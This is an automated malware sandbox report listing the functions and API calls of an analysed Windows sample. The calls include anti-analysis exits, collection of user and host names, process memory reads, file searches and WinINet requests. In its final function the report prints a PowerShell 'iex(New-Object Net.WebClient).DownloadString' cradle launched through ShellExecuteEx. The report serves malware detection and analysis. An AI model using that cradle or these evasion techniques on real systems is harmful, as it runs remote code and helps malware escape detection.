Instruction Fuzzy Hash: B0416872D111086BDB14EBE4DC85FEE7339AB48700F044A5DB61597184EBB5B7888BE2

Function 004137B0 Relevance: 9.1, APIs: 6, Instructions: 122stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 004137D8

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

strtok_s.MSVCRT ref: 00413921

Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,02EB2270,?,004210F4,?,00000000), ref: 0041AB3B
Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrcpystrtok_s$lstrlen
String ID:
API String ID: 3184129880-0
Opcode ID: 6c6fb7d06333238994955fa4e9c6fc16004326b07765d99504ffdab069fb4719
Instruction ID: b6ea97cb77591b20574b5f8bad6a91ea9d9e82a59cceccb6aeafc47a8efa6348
Opcode Fuzzy Hash: 6c6fb7d06333238994955fa4e9c6fc16004326b07765d99504ffdab069fb4719
Instruction Fuzzy Hash: 9541A471E101099BCB04EFA5D945AEEB779AF44314F00801EF51677291EB78AA84CFAA

Function 048C9CB7 Relevance: 9.1, APIs: 6, Instructions: 107networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(00420AF6,00000001,00000000,00000000,00000000), ref: 048C9CD1
InternetOpenUrlA.WININET(00000000,00421250,00000000,00000000,80000000,00000000), ref: 048C9D12
InternetCloseHandle.WININET(00000000), ref: 048C9D2E

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Internet$Open$CloseHandle
String ID:
API String ID: 3289985339-0
Opcode ID: bca365d301c4be2b616a8be254450e4ba1b9890f5e8d3d3b41a1ac88c57e5a7f
Instruction ID: 2165432738bb02f4224ae8c790bad72607bb8b5660a983908ffeedbd63efd7e7
Opcode Fuzzy Hash: bca365d301c4be2b616a8be254450e4ba1b9890f5e8d3d3b41a1ac88c57e5a7f
Instruction Fuzzy Hash: D3416A71A01268EBDB14EF98CC84FDDB3B5AB08748F504699F549F6190DBB4BE80CB25

Function 0041B68C Relevance: 9.1, APIs: 6, Instructions: 98COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 0041B69A

Part of subcall function 0041B2BC: __mtinitlocknum.LIBCMT ref: 0041B2D2
Part of subcall function 0041B2BC: __amsg_exit.LIBCMT ref: 0041B2DE
Part of subcall function 0041B2BC: EnterCriticalSection.KERNEL32(?,?,?,0041AF70,0000000E,0042A218,0000000C,0041AF3A), ref: 0041B2E6

DecodePointer.KERNEL32(0042A258,00000020,0041B7DD,?,00000001,00000000,?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E), ref: 0041B6D6
DecodePointer.KERNEL32(?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A218,0000000C,0041AF3A), ref: 0041B6E7

Part of subcall function 0041C136: EncodePointer.KERNEL32(00000000,0041C393,004D5FB8,00000314,00000000,?,?,?,?,?,0041BA07,004D5FB8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041C138

DecodePointer.KERNEL32(-00000004,?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A218,0000000C,0041AF3A), ref: 0041B70D
DecodePointer.KERNEL32(?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A218,0000000C,0041AF3A), ref: 0041B720
DecodePointer.KERNEL32(?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A218,0000000C,0041AF3A), ref: 0041B72A

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2005412495-0
Opcode ID: d852e3d7d835d6e62f18a9395bea30f13d719b1b24e180a4b449e11ade6884fe
Instruction ID: 83cc19c0f9a08cc6c8264b8aa057ea451e2e215f117fa7a6923d46f1cea91310
Opcode Fuzzy Hash: d852e3d7d835d6e62f18a9395bea30f13d719b1b24e180a4b449e11ade6884fe
Instruction Fuzzy Hash: D131F974900349DFDF11AFA9D9856DDBAF1FF88314F14402BE460A62A0DBB84985CF99

Function 048D6EF7 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 048D9E17: GetProcAddress.KERNEL32(006D72B8,006D6C04), ref: 048D9E58
Part of subcall function 048D9E17: GetProcAddress.KERNEL32(006D72B8,006D6FC8), ref: 048D9E71
Part of subcall function 048D9E17: GetProcAddress.KERNEL32(006D72B8,006D7044), ref: 048D9E89
Part of subcall function 048D9E17: GetProcAddress.KERNEL32(006D72B8,006D6C64), ref: 048D9EA1
Part of subcall function 048D9E17: GetProcAddress.KERNEL32(006D72B8,006D6C50), ref: 048D9EBA
Part of subcall function 048D9E17: GetProcAddress.KERNEL32(006D72B8,006D6CF8), ref: 048D9ED2
Part of subcall function 048D9E17: GetProcAddress.KERNEL32(006D72B8,006D6ED4), ref: 048D9EEA
Part of subcall function 048D9E17: GetProcAddress.KERNEL32(006D72B8,006D6D3C), ref: 048D9F03
Part of subcall function 048D9E17: GetProcAddress.KERNEL32(006D72B8,006D6FA0), ref: 048D9F1B
Part of subcall function 048D9E17: GetProcAddress.KERNEL32(006D72B8,006D6F48), ref: 048D9F33
Part of subcall function 048D9E17: GetProcAddress.KERNEL32(006D72B8,006D6DBC), ref: 048D9F4C
Part of subcall function 048D9E17: GetProcAddress.KERNEL32(006D72B8,006D6CE8), ref: 048D9F64
Part of subcall function 048D9E17: GetProcAddress.KERNEL32(006D72B8,006D700C), ref: 048D9F7C
Part of subcall function 048D9E17: GetProcAddress.KERNEL32(006D72B8,006D6AB0), ref: 048D9F95

Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF

Part of subcall function 048C1437: ExitProcess.KERNEL32 ref: 048C1478

Part of subcall function 048C13C7: GetSystemInfo.KERNEL32(?), ref: 048C13D1
Part of subcall function 048C13C7: ExitProcess.KERNEL32 ref: 048C13E5

Part of subcall function 048C1377: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 048C1392
Part of subcall function 048C1377: VirtualAllocExNuma.KERNEL32(00000000), ref: 048C1399
Part of subcall function 048C1377: ExitProcess.KERNEL32 ref: 048C13AA

Part of subcall function 048C1487: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 048C14A5
Part of subcall function 048C1487: __aulldiv.LIBCMT ref: 048C14BF
Part of subcall function 048C1487: __aulldiv.LIBCMT ref: 048C14CD
Part of subcall function 048C1487: ExitProcess.KERNEL32 ref: 048C14FB

Part of subcall function 048D6C77: GetUserDefaultLangID.KERNEL32 ref: 048D6C7B

Part of subcall function 048C13F7: ExitProcess.KERNEL32 ref: 048C142D

Part of subcall function 048D7C47: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,048C141E), ref: 048D7C77
Part of subcall function 048D7C47: RtlAllocateHeap.NTDLL(00000000), ref: 048D7C7E
Part of subcall function 048D7C47: GetUserNameA.ADVAPI32(00000104,00000104), ref: 048D7C96

Part of subcall function 048D7CD7: GetProcessHeap.KERNEL32(00000000,00000104), ref: 048D7D07
Part of subcall function 048D7CD7: RtlAllocateHeap.NTDLL(00000000), ref: 048D7D0E
Part of subcall function 048D7CD7: GetComputerNameA.KERNEL32(?,00000104), ref: 048D7D26

Part of subcall function 048DAF27: lstrlen.KERNEL32(?,006D6BF0,?,004250DC,00420E1A), ref: 048DAF3C
Part of subcall function 048DAF27: lstrcpy.KERNEL32(00000000), ref: 048DAF7B
Part of subcall function 048DAF27: lstrcat.KERNEL32(00000000,00000000), ref: 048DAF89

Part of subcall function 048DAE17: lstrcpy.KERNEL32(?,00420E1A), ref: 048DAE7C

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,006D6F40,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 048D6FD1
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 048D6FEF
CloseHandle.KERNEL32(00000000), ref: 048D7000
Sleep.KERNEL32(00001770), ref: 048D700B
CloseHandle.KERNEL32(?,00000000,?,006D6F40,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 048D7021
ExitProcess.KERNEL32 ref: 048D7029

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 2525456742-0
Opcode ID: dff8bde81555aea59465c9e16628ddb3addc1784a124ec154de877713b950503
Instruction ID: 202e6d728f24efebbd4d3ab1e8c74bc65548c81260a7eff50bfa5358f1b83f52
Opcode Fuzzy Hash: dff8bde81555aea59465c9e16628ddb3addc1784a124ec154de877713b950503
Instruction Fuzzy Hash: 45315071E42218AAEB08FBF8EC54AFD7375AF14208F500F59A552E2090EFF47904CA63

Function 0040A110 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
LocalFree.KERNEL32(00410447), ref: 0040A1E0
CloseHandle.KERNEL32(000000FF), ref: 0040A1EA

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: a501a1be7f016b5cb91172ca14ff62cfed5f90a871d90683b41ae69171fc1efd
Instruction ID: e28607e9d9a2a96074382c0c0d30a82733061daf82e5a8752830093732aacc78
Opcode Fuzzy Hash: a501a1be7f016b5cb91172ca14ff62cfed5f90a871d90683b41ae69171fc1efd
Instruction Fuzzy Hash: 9731FC74A01209EFDB14CF94D845BEE77B5AB48304F10815AE911AB3D0D778AA91CFA6

Function 048CA377 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 048CA3A3
GetFileSizeEx.KERNEL32(000000FF,?), ref: 048CA3C8
LocalAlloc.KERNEL32(00000040,?), ref: 048CA3E8
ReadFile.KERNEL32(000000FF,?,00000000,048C16F6,00000000), ref: 048CA411
LocalFree.KERNEL32(048C16F6), ref: 048CA447
CloseHandle.KERNEL32(000000FF), ref: 048CA451

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: 06cf558428df834f5adc8c7b4b2342f5685766828323e2485330cc1a7ca5d982
Instruction ID: 62b7550b063f2c386244db1876a0b4b559b67f782fabbd266835022ff6d31ff2
Opcode Fuzzy Hash: 06cf558428df834f5adc8c7b4b2342f5685766828323e2485330cc1a7ca5d982
Instruction Fuzzy Hash: 3F310AB4A0120DEFDB14CFA4D889BAE77B5BF48700F108659E911A7290D774AA81CFA1

Function 0041CD0E Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0041CD1A

Part of subcall function 0041C2A0: __getptd_noexit.LIBCMT ref: 0041C2A3
Part of subcall function 0041C2A0: __amsg_exit.LIBCMT ref: 0041C2B0

__amsg_exit.LIBCMT ref: 0041CD3A
__lock.LIBCMT ref: 0041CD4A
InterlockedDecrement.KERNEL32(?), ref: 0041CD67
free.MSVCRT ref: 0041CD7A
InterlockedIncrement.KERNEL32(0042C558), ref: 0041CD92

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
String ID:
API String ID: 634100517-0
Opcode ID: 525e96ac9f68bb1e385b36e47090da98a0ef9a1698a14b7f5a5138d390f6750c
Instruction ID: 9bccb4d37e88352bd342e74b92a79a764fb3ddc235490c160eda478cd1c3264c
Opcode Fuzzy Hash: 525e96ac9f68bb1e385b36e47090da98a0ef9a1698a14b7f5a5138d390f6750c
Instruction Fuzzy Hash: C8018835A816219BC721AB6AACC57DE7B60BF04714F55412BE80467790C73CA9C1CBDD

Function 048DCF75 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 048DCF81

Part of subcall function 048DC507: __getptd_noexit.LIBCMT ref: 048DC50A
Part of subcall function 048DC507: __amsg_exit.LIBCMT ref: 048DC517

__amsg_exit.LIBCMT ref: 048DCFA1
__lock.LIBCMT ref: 048DCFB1
InterlockedDecrement.KERNEL32(?), ref: 048DCFCE
free.MSVCRT ref: 048DCFE1
InterlockedIncrement.KERNEL32(0042C980), ref: 048DCFF9

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
String ID:
API String ID: 634100517-0
Opcode ID: a406f9b520e450cd513daa8d859430686771864cb966364ac70015d3cab56a31
Instruction ID: f1506299e7a2210f60715f940db5d011d333e95f1b0dcd36ea789d518f29380b
Opcode Fuzzy Hash: a406f9b520e450cd513daa8d859430686771864cb966364ac70015d3cab56a31
Instruction Fuzzy Hash: E701C031A03A21ABDB24AF699444B9DB7A0BF04718F010B16EC45E7280CBB4B981DFD6

Function 00417180 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 0041719F
??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0041741A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 004171CD

Part of subcall function 00416E50: strlen.MSVCRT ref: 00416E61
Part of subcall function 00416E50: strlen.MSVCRT ref: 00416E85

VirtualQueryEx.KERNEL32(0041758D,00000000,?,0000001C), ref: 00417212
??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041741A), ref: 00417333

Part of subcall function 00417060: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00417078

Strings

@, xrefs: 00417226

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: strlen$MemoryProcessQueryReadVirtual
String ID: @
API String ID: 2950663791-2766056989
Opcode ID: fb37d5dfae784a160399b72835e1c1bb9686aa045b5c8bb6ae6988575cdfbf40
Instruction ID: d4c246fcbb90b677cbfa603dc812bd51b07a2c71a26f71c1c9cdc23e16c3c5e2
Opcode Fuzzy Hash: fb37d5dfae784a160399b72835e1c1bb9686aa045b5c8bb6ae6988575cdfbf40
Instruction Fuzzy Hash: CD5106B5E04109EBDB08CF98D981AEFB7B6BF88300F148159F915A7340D738AA41DBA5

Function 048D73E7 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 048D7406
??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,048D7681,00000000,00420BB0,00000000,00000000), ref: 048D7434

Part of subcall function 048D70B7: strlen.MSVCRT ref: 048D70C8
Part of subcall function 048D70B7: strlen.MSVCRT ref: 048D70EC

VirtualQueryEx.KERNEL32(048D77F4,00000000,?,0000001C), ref: 048D7479
??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,048D7681), ref: 048D759A

Part of subcall function 048D72C7: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 048D72DF

Strings

@, xrefs: 048D748D

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: strlen$MemoryProcessQueryReadVirtual
String ID: @
API String ID: 2950663791-2766056989
Opcode ID: fb37d5dfae784a160399b72835e1c1bb9686aa045b5c8bb6ae6988575cdfbf40
Instruction ID: 521f3464e3ffa35ea5f6aa06e631ac3f29adb46e3ed09bb7d2c47f5e4942c3d7
Opcode Fuzzy Hash: fb37d5dfae784a160399b72835e1c1bb9686aa045b5c8bb6ae6988575cdfbf40
Instruction Fuzzy Hash: 6451E6B1A01109EFDB04CF99D981AEFB7B6BF88304F108619F919A7240D735EA11CBA1

Function 00406A00 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 155libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00406E7A), ref: 00406A69

Strings

zn@, xrefs: 00406A0D, 00406A19, 00406A2C, 00406A35, 00406A59, 00406A82, 00406A85, 00406B3F, 00406B51, 00406B5D, 00406B66, 00406BE3, 00406B99, 00406A9A, 00406ABD, 00406AC9, 00406AF1, 00406B21, 00406B33, 00406AFD, 00406B0A, 00406AA6
zn@, xrefs: 00406B78, 00406C06, 00406C0B, 00406BB5

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: zn@$zn@
API String ID: 1029625771-1156428846
Opcode ID: 3fc5a8dedeb49d1d19b08a8b2b74cc72c2b475cc3767d007be69e7bc9d832ffb
Instruction ID: 56bd16fc9bcf92c18956b4b249a59c76870f8c01999fa8d2962da2cd55bb9a52
Opcode Fuzzy Hash: 3fc5a8dedeb49d1d19b08a8b2b74cc72c2b475cc3767d007be69e7bc9d832ffb
Instruction Fuzzy Hash: C571D874A04109DFDB04CF48C494BAAB7B1FF88305F158179E84AAF395C739AA91CF95

Function 048D4C37 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,006D6D0C), ref: 048D4C92

Part of subcall function 048D91D7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 048D9202

lstrcat.KERNEL32(?,00000000), ref: 048D4CB8
lstrcat.KERNEL32(?,?), ref: 048D4CD7
lstrcat.KERNEL32(?,?), ref: 048D4CEB
lstrcat.KERNEL32(?,006D6C84), ref: 048D4CFE
lstrcat.KERNEL32(?,?), ref: 048D4D12
lstrcat.KERNEL32(?,006D6CC8), ref: 048D4D26

Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF

Part of subcall function 048D9187: GetFileAttributesA.KERNEL32(00000000,?,048C1DFB,?,?,0042577C,?,?,00420E22), ref: 048D9196

Part of subcall function 048D4A27: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 048D4A37
Part of subcall function 048D4A27: RtlAllocateHeap.NTDLL(00000000), ref: 048D4A3E
Part of subcall function 048D4A27: wsprintfA.USER32 ref: 048D4A5D
Part of subcall function 048D4A27: FindFirstFileA.KERNEL32(?,?), ref: 048D4A74

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 2540262943-0
Opcode ID: 91df7f0c7e554cb1d3044ee6f87cd087b154477ead0d8d2d1c74f8365ca17e83
Instruction ID: aaef013fd0a5e584ad87187e73ea996d36b7ee831bbaaa747a8c62e73c8e38e1
Opcode Fuzzy Hash: 91df7f0c7e554cb1d3044ee6f87cd087b154477ead0d8d2d1c74f8365ca17e83
Instruction Fuzzy Hash: CC3153F2D0121867DB14FBB4DC84EE9733DAB58704F444B89B656D6090EAB4ABC8CF91

Function 00412EE0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

ShellExecuteEx.SHELL32(0000003C), ref: 00412FD5

Strings

')", xrefs: 00412F03
-nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412F14
<, xrefs: 00412F89
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412F54

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
API String ID: 3031569214-898575020
Opcode ID: ceff6c1b0c5b41120544c3d3be6942fd96f27d98ecc1bbdb5468e056c7fe4573
